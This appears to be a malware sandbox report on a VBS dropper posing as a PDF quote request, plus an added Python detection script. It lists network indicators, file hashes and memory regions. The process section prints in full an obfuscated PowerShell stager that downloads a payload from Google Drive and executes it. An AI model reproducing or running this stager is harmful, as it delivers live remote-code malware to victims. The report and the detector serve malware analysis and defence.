DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. 
Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | drive.google.com | udp
GB | 142.250.187.238:443 | drive.google.com | tcp
US | 8.8.8.8:53 | drive.usercontent.google.com | udp
GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp
GB | 142.250.187.238:443 | drive.google.com | tcp
GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp
US | 24.199.107.111:80 | 24.199.107.111 | tcp
US | 24.199.107.111:80 | 24.199.107.111 | tcp
US | 24.199.107.111:80 | 24.199.107.111 | tcp
US | 24.199.107.111:80 | 24.199.107.111 | tcp

Files

C:\Users\Admin\AppData\Local\Temp\Rundturens.txt

MD5 03bae939a15e762bb1756a567c9bd578
SHA1 84d62a892d37bccc6c581eb8dbaf7c918840d6eb
SHA256 2d17f4f588c71d3eceb4cca1fe9cce3f2736e9eaabaf20c4f4b624db10a62c5b
SHA512 ac7efa0a9d0d76937eeaa4e472ca8ab841b96440ea11d4c4e23ebba5ec834b2b6883de6d543cfa7ab7ffde2a7ec12f98379104b18a83c71415f9f7aba4b833d6

C:\Users\Admin\AppData\Local\Temp\Rundturens.txt

MD5 5bd2dfc2307bbcb70795bf4e2dca5705
SHA1 bd627cc3ed2439e0519f3d270cf4830a58f3c2b9
SHA256 18985f6235a0579e66f12ccf36cddf6f0fe62d8bfdb1b2716fe7f1849e485e35
SHA512 76340c6020aa19b13ca050239d6b46f92e504fdcaec5540691703678044d4919a7a1e23b7bcae6b50c893001d8446308c4e827fdc7f3ea0bf64a4364b601c5ea

C:\Users\Admin\AppData\Local\Temp\Rundturens.txt

MD5 5b8916a3a1c5ab545cdbfc9a369b5b4e
SHA1 a6dd67b3c4012e3abedacf5938a490793eaa5577
SHA256 d3324a3d102f9a81324021e25d8ecc24c50e2aca7550ac6576c87201cf4d00cb
SHA512 0187edd03632a27435f7518153a51028639f336f1f079112678d2284439b4a89856661ee5142ad0cf999c08b2246fd0b1b7be9adc929e093a4699ac97a0a628e

C:\Users\Admin\AppData\Local\Temp\Rundturens.txt

MD5 9d039c6db13ca51bac16622fe44c6f2f
SHA1 bb3bb35b12bdad339592fb5b682cd0b20d3a61f6
SHA256 7860b5afe259c1aaf3218e1f493ba4d835eea5b1266ee24d0a44ace81e1d59f4
SHA512 ab12eb5d212553bf9c41c3d298c513237ac24688f319a674ffa2d174a637c2110fb638c8b7205696f9ac9c7076b9fa9e54f2ab66e99cf2eea2380bd5672154cf

C:\Users\Admin\AppData\Local\Temp\Rundturens.txt

MD5 6d2f56b75ad7c3d42261570cfb4c19f8
SHA1 9616444765f5e842e8cd30e59360a1d2d21d1a7c
SHA256 8d1394b7495aa21988766179ad71f6e8b7698309b1ea87e264cd431bf7f5fc2e
SHA512 25d28be131bcc1c4a5a06c30c529b8724cc7ac7d465181cce45aff9761e0d7e4550a4a9a66938e097c0a1f0b41bd6c50ab4ae6c8b40bc8bbc7e145084af7aea2

C:\Users\Admin\AppData\Local\Temp\Rundturens.txt

MD5 683888a0e92a09540216b7c9104f0120
SHA1 025540e79ce672145db74c9e024387627a6e48d4
SHA256 1e87133a9c7699f4b42a5206a1cdb95a1190ad6d3c8227012a485d52d2dd2b3b
SHA512 9e7f32a50eb43a4ebb12cb33deff20245b0762241809c726de21e944e963bfeb9b1f7bcb8e041e58e908fb3e5908f6d87b084c21756648acd0182ca2e97a0236

memory/1640-330-0x000000001B650000-0x000000001B932000-memory.dmp

memory/1640-336-0x0000000002CC0000-0x0000000002D40000-memory.dmp

memory/1640-335-0x0000000002CC0000-0x0000000002D40000-memory.dmp

memory/1640-334-0x000007FEF57C0000-0x000007FEF615D000-memory.dmp

memory/1640-333-0x00000000028F0000-0x00000000028F8000-memory.dmp

memory/1640-332-0x0000000002CC0000-0x0000000002D40000-memory.dmp

memory/1640-331-0x000007FEF57C0000-0x000007FEF615D000-memory.dmp

memory/1640-337-0x0000000002CC0000-0x0000000002D40000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OHX4HB11Y0YW5TMUC3DX.temp

MD5 dd9a506fa407783c90e4d255c742ea62
SHA1 ba3673d3688f3e42e906b4f301f859aeb171f546
SHA256 20c26f06a003df26ec7bab30ae8ba3f21c09176cb605e44a1023a5242bce4d50
SHA512 d1e1d6fdccb085e3d1d2764875f69d6ea024e0b0b098669e52496e4361c2cbb18d5755936b7a1e009be0877ff25c27d50844bf06d5b6a6145007d66a2d6cabcc

memory/1592-342-0x00000000734C0000-0x0000000073A6B000-memory.dmp

memory/1592-343-0x0000000002C10000-0x0000000002C50000-memory.dmp

memory/1592-344-0x0000000002C10000-0x0000000002C50000-memory.dmp

memory/1592-345-0x00000000734C0000-0x0000000073A6B000-memory.dmp

C:\Users\Admin\AppData\Roaming\gennemsgnings.Fas

MD5 eef3f42f8568ec1d96e3fc1a3174c27f
SHA1 b58f1fae7aeb4f69389a46d62fb110c5bf0b39a2
SHA256 f87d719b62b1b6a582ae647b47dcb70855495c65307cc786ebaf1580a7f1628e
SHA512 f386755db46e2454711107f92c6ebc47dbfb50d047ddc296304703223928f5a1e8a6156e05e1544e2fd9b07cf63a5fdf54a16ce3010f650670c828f8ee4d37dc

memory/1640-347-0x0000000002CC0000-0x0000000002D40000-memory.dmp

memory/1640-348-0x000007FEF57C0000-0x000007FEF615D000-memory.dmp

memory/1640-349-0x0000000002CC0000-0x0000000002D40000-memory.dmp

memory/1592-350-0x0000000002C10000-0x0000000002C50000-memory.dmp

memory/1640-351-0x0000000002CC0000-0x0000000002D40000-memory.dmp

memory/1592-353-0x00000000065E0000-0x0000000008E7F000-memory.dmp

memory/1592-355-0x00000000065E0000-0x0000000008E7F000-memory.dmp

memory/1592-354-0x0000000005620000-0x0000000005621000-memory.dmp

memory/1640-352-0x0000000002CC0000-0x0000000002D40000-memory.dmp

memory/1592-356-0x00000000773D0000-0x0000000077579000-memory.dmp

memory/1592-357-0x00000000734C0000-0x0000000073A6B000-memory.dmp

memory/1592-358-0x00000000775C0000-0x0000000077696000-memory.dmp

memory/1592-359-0x0000000002C10000-0x0000000002C50000-memory.dmp

memory/2772-360-0x0000000000DD0000-0x000000000366F000-memory.dmp

memory/2772-361-0x00000000773D0000-0x0000000077579000-memory.dmp

memory/2772-363-0x00000000775C0000-0x0000000077696000-memory.dmp

memory/2772-364-0x00000000775F6000-0x00000000775F7000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 839428e849bbf7a3401bf4023d474a79
SHA1 49b69cbaf7ba5c2df88e539f36dc62e66dfd68e8
SHA256 fe2031ad3ab21ea0ba4f9345a46fa83367016b20644000f80516b0b0b18ce7b7
SHA512 b92d96db00e76b050cca2b6c9fbffa0dda5bf86dad76cffe6e765836d279acce48d52f8cbf079130ad527e6fedf780f39498052e89a5dd0f88cb7fc07dc687c2

memory/1592-389-0x00000000065E0000-0x0000000008E7F000-memory.dmp

memory/1592-391-0x00000000065E0000-0x0000000008E7F000-memory.dmp

memory/2772-390-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2772-388-0x0000000000DD0000-0x000000000366F000-memory.dmp

memory/2772-392-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2772-393-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2772-394-0x0000000000400000-0x0000000000581000-memory.dmp

memory/1640-396-0x000007FEF57C0000-0x000007FEF615D000-memory.dmp

memory/2772-395-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2772-398-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2772-402-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2772-404-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2772-403-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2772-405-0x0000000000400000-0x0000000000581000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1298544033-3225604241-2703760938-1000\0f5007522459c86e95ffcc62f32308f1_e3fd1d67-4513-4809-a7f1-bf54bd53bdbc

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1298544033-3225604241-2703760938-1000\0f5007522459c86e95ffcc62f32308f1_e3fd1d67-4513-4809-a7f1-bf54bd53bdbc

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

memory/2772-424-0x0000000000DD0000-0x000000000366F000-memory.dmp

memory/2772-426-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2772-427-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2772-428-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2772-429-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2772-430-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2772-431-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2772-432-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2772-433-0x0000000000400000-0x0000000000581000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-18 19:06

Reported

2024-04-18 19:08

Platform

win10v2004-20240412-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Proposal Quote_2414976·pdf.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
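The signature rows above are the sandbox's view of the chain. The same chain is visible in endpoint process-creation telemetry (Sysmon Event ID 1, or 4688 with command-line logging enabled), and the process command lines recorded in this analysis are enough to write the rule. The Python below is an added example, not part of this report: it replays constructed process events modelled on the behavioral2 process list (only PID 820, named in WerFault's -p argument, comes from the report; the other PIDs, the parent links and the abridged script body are assumptions) and flags each stage: a script host launching PowerShell, the 64-bit PowerShell re-launching the same script under SysWOW64, the string-assembled `.Invoke` obfuscation, the cmd.exe `echo %appdata%` helper, and the WerFault report for the 32-bit host. The ATT&CK technique IDs are the standard ones for those behaviours.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
# Abridged opening of the stager as recorded in this report (decoder function and
# the decoded `iex` alias); the thousands of encoded literals are left out.
BODY = ("$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';"
        "Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;"
        "For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8))"
        "{$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}"
        "function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}"
        "$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';Medicinmands $Provivisection;")


def stager(image):
    return f'"{image}" "{BODY}"'


# Constructed events modelled on the behavioral2 process list. PIDs other than 820
# and all parent links are assumed for the example.
EVENTS = [
    ProcEvent(4100, 4000, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Proposal Quote_2414976·pdf.vbs"'),
    ProcEvent(1396, 4100, PS64, stager(PS64)),
    ProcEvent(4200, 1396, r"C:\Windows\system32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"'),
    ProcEvent(820, 1396, PS32, stager(PS32)),
    ProcEvent(4300, 820, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"'),
    ProcEvent(4400, 820, r"C:\Windows\SysWOW64\WerFault.exe",
              r"C:\Windows\SysWOW64\WerFault.exe -u -p 820 -s 2360"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
DYNAMIC_INVOKE_RE = re.compile(r"\$\w+\.\$\w+\.Invoke\(")   # $obj.$methodNameVar.Invoke(
ENV_ECHO_RE = re.compile(r'/c\s+"?echo\s+%\w+%', re.I)
WERFAULT_PID_RE = re.compile(r"-p\s+(\d+)")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_wow64(path):
    return "\\syswow64\\" in path.lower()


def literal_fraction(cmdline):
    """Share of the command line inside single-quoted literals. The GuLoader
    stager is almost entirely literals; ordinary PowerShell is not."""
    inside = sum(len(s) for s in re.findall(r"'([^']*)'", cmdline))
    return inside / max(len(cmdline), 1)


def analyze(events):
    """Return (pid, technique, reason) findings for the behaviours in the chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name, parent = basename(e.image), by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        if pname in SCRIPT_HOSTS and name in SHELLS:
            findings.append((e.pid, "T1059.005", f"{pname} spawned {name}"))
        if name == "powershell.exe" and pname == "powershell.exe" \
                and is_wow64(e.image) and not is_wow64(parent.image):
            findings.append((e.pid, "T1059.001",
                             "64-bit PowerShell relaunched the same script as 32-bit (SysWOW64)"))
        if name == "powershell.exe" and (DYNAMIC_INVOKE_RE.search(e.cmdline)
                                         or literal_fraction(e.cmdline) > 0.7):
            findings.append((e.pid, "T1027",
                             "string-assembled method called via .Invoke, or literal-dominated command line"))
        if name == "cmd.exe" and pname == "powershell.exe" and ENV_ECHO_RE.search(e.cmdline):
            findings.append((e.pid, "T1059.003",
                             "cmd.exe used only to expand an environment variable for PowerShell"))
        if name == "werfault.exe":
            m = WERFAULT_PID_RE.search(e.cmdline)
            crashed = by_pid.get(int(m.group(1))) if m else None
            if crashed and basename(crashed.image) == "powershell.exe":
                findings.append((crashed.pid, "info",
                                 "PowerShell crashed: a later injection stage likely failed in this run"))
    return findings


def ancestry(events, pid):
    """Render the parent chain of a PID, e.g. 'powershell.exe (wow64) <- powershell.exe <- wscript.exe'."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        e = by_pid[pid]
        chain.append(basename(e.image) + (" (wow64)" if is_wow64(e.image) else ""))
        pid = e.ppid
    return " <- ".join(chain)


if __name__ == "__main__":
    for pid, technique, reason in analyze(EVENTS):
        print(f"pid {pid:>5}  {technique:<10} {reason}")
        print(f"           chain: {ancestry(EVENTS, pid)}")
```

The 64-to-32-bit re-launch is the row worth alerting on by itself: a legitimate script has no reason to start SysWOW64 PowerShell from System32 PowerShell with the identical command line, whereas a loader that carries 32-bit shellcode must. The literal-fraction heuristic needs full command lines; if the logging source truncates them, the `.Invoke` pattern still fires because it sits in the first few hundred bytes.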

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Proposal Quote_2414976·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. 
Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr 
S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso 
MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. 
Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli 